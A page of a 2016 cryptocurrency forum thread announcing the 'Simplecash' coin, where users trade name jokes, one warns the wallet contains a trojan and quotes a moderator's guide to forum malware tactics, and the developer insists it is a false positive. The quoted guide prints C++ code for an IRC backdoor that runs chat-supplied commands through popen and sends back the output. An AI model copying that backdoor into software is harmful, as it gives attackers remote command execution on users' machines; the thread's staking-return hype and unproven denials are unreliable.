Home   Help Search Login Register More  
Poll
Question: Launch POW tonight?
Yes - 8 (72.7%)
No - 3 (27.3%)
Total Voters: 11

Pages: « 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 »  All
  Print  
Author Topic: [ANN]Simplecash - [SIMP] - POW over. 162 % daily begins! join this nice coin  (Read 16002 times)
Fweebie5

Activity: 190
Merit: 100

Fweebs

View Profile
December 05, 2016, 11:32:14 PM

So no one likes my name suggestion on the other page of pimplecash.

I really think its a great name and should be considered.

sorry but i think its ok with simplecash
we can name the decimals pimps or something but namechance isnt a real option

Find & Replace the Name, Update Version numbers, Recompile and it's done, so it is a "real" option unless you don't know how to do it Cheesy
plost24

Activity: 462
Merit: 250

View Profile
December 06, 2016, 12:09:25 AM

So no one likes my name suggestion on the other page of pimplecash.

I really think its a great name and should be considered.

sorry but i think its ok with simplecash
we can name the decimals pimps or something but namechance isnt a real option

If we can call the decimals pimples that would be fine as long as I get a credit for it. Maybe we can call the 8th and final decimal a plostpimple.
 Smiley

For rent 1.4 Bitcoin for 11 months starting Feb 1 2017
Fweebie5

Activity: 190
Merit: 100

Fweebs

View Profile
December 06, 2016, 01:17:57 AM

Yet again we have another generic coin with a remote trojan injected inside....DELETE

FROM SYMANTEC
Discovered:  March 16, 2014
Updated:  March 20, 2014 12:36:43 PM
Type:  Trojan
Infection Length:  Varies
Systems Affected:  Mac OS X, Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Coinstealer is a Trojan horse that steals information from the compromised computer.

Also note that it doesn't give much hope that the so called "dev" is saying "your/you're" like a teenybopper and short txt msging guru with ur....

Here is some information regarding being safe with altcoins, posted by a Moderator of the Bitcointalk Altcoin Forums

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
while (!feof(buf))
result += pszName;
pclose(buf);
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
olkah

Activity: 1484
Merit: 505

View Profile
December 06, 2016, 01:23:38 AM

https://www.virustotal.com/pt/file/9b0912dc075afe62cd64aaf32a98206985f213446785389a7475d8473f77fac3/analysis/
olkah

Activity: 1484
Merit: 505

View Profile
December 06, 2016, 01:35:02 AM

http://prntscr.com/dfuqqg The coin purse is infected with Trojan. You can check for yourself -----  https://scan.kaspersky.ru/
Affilate User

Activity: 588

View Profile
December 06, 2016, 01:41:58 AM

hi all, are you dream of one coin into 1000 coin in 14 days and the price 0.1btc, try to think clearly. Smiley
simpleca$H (OP)

Activity: 42
Merit: 0

View Profile
December 06, 2016, 09:25:11 AM

hi all, are you dream of one coin into 1000 coin in 14 days and the price 0.1btc, try to think clearly. Smiley

good morning guys

there is no virus in the wallet

the only thing i think its code that we add only to prevent malicious attacks from the system clock...The client check the systemclock that nobody can change it and fake the time to get more stakes!

there is no trojan in the wallet!!!

Really! Trust me! If this coin is virus infected than shadowcash is it 2 !!!!!!! this is shadowfork!!!

i dont kn ow what i have to write more about this but the only thing i can tell you is there is no trojan coded from us!!!!

and yes if u learned a littlebit in school than do your math

1 Coin *162%*14days and show me the result!

if you dont know how this work just shut up and dont say anything that isnt true...

we are really sad about this and the community think we want to infect them with i dont know what!

i guess its the code who check the systemclock nothing more!

Thanks all this coin is going to die for no reason!

Yet again we have another generic coin with a remote trojan injected inside....DELETE

FROM SYMANTEC
Discovered:  March 16, 2014
Updated:  March 20, 2014 12:36:43 PM
Type:  Trojan
Infection Length:  Varies
Systems Affected:  Mac OS X, Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Coinstealer is a Trojan horse that steals information from the compromised computer.

Also note that it doesn't give much hope that the so called "dev" is saying "your/you're" like a teenybopper and short txt msging guru with ur....

Here is some information regarding being safe with altcoins, posted by a Moderator of the Bitcointalk Altcoin Forums

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
while (!feof(buf))
result += pszName;
CFree(buf);
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
while (!feof(buf))
result += pszName;
pclose(buf);
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

check everything..only thing is we got a newbie account not more...so sad....nothing happened with ttrojan and nothing will happen because there is no trojan!
simpleca$H (OP)

View Profile
December 06, 2016, 11:09:16 AM
Last edit: December 06, 2016, 11:49:04 AM by simpleca$H

everyone!

i scanned the rar file on virustotal

i got this too
https://www.virustotal.com/de/file/9b0912dc075afe62cd64aaf32a98206985f213446785389a7475d8473f77fac3/analysis/

i scanned the windows exe file and there was just this

https://www.virustotal.com/de/file/16e848dfc32287b50365ac06998411093cde5651fc124e837ebbc08b73f75037/analysis/

no coinstealer shit in the exe!

believe me please we will do everything to get this fixed but the wallet isn infected!

is something happened until now by someone?please tell me...nobody will answer because nobody got hacked!

you guys really killing the coin....

its just a wrong flag from kaspersky!go research a littlebit..

look into the code! there is nothing like a backdoor!

WE ARE SERIOUS! WE DONT WANT TO HACK PEOPLE.WE NEED THE COMMUNITY!!

only kaspersky flagged it and a noname nothing else...nobody is infected on his system...nobody got hacked...nothing!

please guys common...This is a real project and only because of virustotal the coin will die Sad Sad

these toxic people...sorry for the words but we are really sad about this...
we had a good feeling about this the coin ran smmoth and still run smooth. But there are some "nonames" who can kill the coin...

just 1 link for a little proof that this is wrong flagged!!!

https://forum.kaspersky.com/index.php?s=&showtopic=226613&view=findpost&p=1842605

oh here another one

https://forum.kaspersky.com/index.php?s=&showtopic=330759&view=findpost&p=2456961

simpleca$H (OP)

View Profile
December 06, 2016, 11:24:16 AM

DO YOUR RESEARCH BEFORE POSTING ANYTHING!!!!!!!!!!!!

YOU GUYS KILLED THIS FOR NOTHING
gambino

Activity: 570
Merit: 500

View Profile
December 06, 2016, 12:23:54 PM

But there are some "nonames" who can kill the coin...

Who are you dev?
Why should we trust you, when you just copy paste a coin which is trying to sell as ICO?
What coding skills you have?
Why you pay bounty from the premine for new graphics, blockexplorer and website, when you take money from the ICO?
How we can trust you that there is no virus, while you didn't show anything by now, else that you want easy money?
simpleca$H (OP)

View Profile
December 06, 2016, 12:56:39 PM

But there are some "nonames" who can kill the coin...

Who are you dev?
Why should we trust you, when you just copy paste a coin which is trying to sell as ICO?
What coding skills you have?
Why you pay bounty from the premine for new graphics, blockexplorer and website, when you take money from the ICO?
How we can trust you that there is no virus, while you didn't show anything by now, else that you want easy money?

We are 3 people working on the coin..Most experience in c,vb and sql but mostly c
We are all over 30 years old.Got familys and JOBS!

the ICO is over.We sold 0.2 BTC worth of simp. only for your interests.
every coin based on bitcoin or another altcoin...dont tell all time about copy paste..if this is so easy...why u didnt do it by yourself.we added some parameters for the high staking period , few timestamps and some code to prevent malicious attacks by the users.systemclock....staking....i dont go into it.

I want to pay bounties with simp because we want to spread the coins! Nothing more.We are still interested in spreading the coins!With 0.2 btc we arent able to pay in btc right..
We took coinex as Escrow because we wanted that the investor have a better feeling than here on bct.we knew that we didnt sell everything...
Why easy money?where is easy money??there is no easy money..
we are still in the early stage less than 4k blocks...the network is stable no problems til now...why should we rush into it...
i posted some links , kaspersky got issues with this and flagged it all time...its false positive...check your systems..i guess nothing changed!because there is no virus
how can i proof this...i cannot proof this more than posting some links from kaspersky forum..

people always thinking a coin developer is 24hr online 24hrs coding 24hrs support 24hrs everything...we all have a job and we are doing our best for sure!
but guys like you will kill this what we are trying to build. the fun factor is exactly 0 after i read posts like this...its sad..

i call them nonames because they are nothing more than a newbie or a member so not really better than our account...
gambino

Activity: 570
Merit: 500

View Profile
December 06, 2016, 03:37:15 PM

Can you provide a deadline when we will see something different from changing few parameters from you?
minerbro

Activity: 415
Merit: 287

View Profile
December 06, 2016, 03:57:55 PM

in such mining, coin value is negligible Cry
plost24

View Profile
December 06, 2016, 06:15:50 PM

PlostPimple for the last satoshi place.

Can we please please get a vote on that

shimlbit
Legendary

Activity: 1302
Merit: 1001

View Profile
December 06, 2016, 06:23:04 PM

Can you provide a deadline when we will see something different from changing few parameters from you?

let them doing their work..its under 5k blocks and you asking for all updates..Watch other coins there are much coins
there are many coins promising every shit and than nothing...this coin is less than 2 weeks old...just wait and mine and stake Smiley
plost24

View Profile
December 06, 2016, 06:25:18 PM

let them doing their work..its under 5k blocks and you asking for all updates..Watch other coins there are much coins
there are many coins promising every shit and than nothing...this coin is less than 2 weeks old...just wait and mine and stake Smiley

Obviously the best action is to mine and stake dude but I still think pimplecash is a better name. Do you agree man?

shimlbit
Legendary

View Profile
December 06, 2016, 06:52:39 PM

Obviously the best action is to mine and stake dude but I still think pimplecash is a better name. Do you agree man?

nah dude simplecash is good simp also..you can do your own project and call it like you want Smiley

i am mining this and high staking begins in 10k blocks...cant wait for that. i like high staking coins and pos 2.0 coins..

and the network has no problems...thats fine...better than few other coins with network issues..forks etc.

zec clones are plenty and people mining this...better mine other coins than zec and clones..

scrypt is not the best algo but high efficient

Let the Rig and Chipminers running for 10k more blocks than the cool action begins!
Lauren Smith

Activity: 1050
Merit: 277

View Profile WWW
December 06, 2016, 07:51:40 PM

I think simpcash is good we must give it a chance and wtf it needs to be called pimpcash show some pride damn you !
Simp cash to moon on a rocket !!

shimlbit
Legendary

View Profile
December 06, 2016, 08:47:00 PM

yes. simplecash is good..

grab as much coins as you can.. i calculated with 1300 pow coins than it will be ~ 1.200.000 simp

so very rare...when the roadmap comes and there is good stuff we can expect a good price

mining is really nice..so low diff...mining is worth!
simpleca$H (OP)

View Profile
December 06, 2016, 10:00:15 PM

thank you guys these are warm words...we are trying our best and its very hard to survive here Sad

we will stay at simplecash!

we added a checkpoint ! I think nobody has syncing issues!

Pages: « 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 »  All
  Print  

Jump to: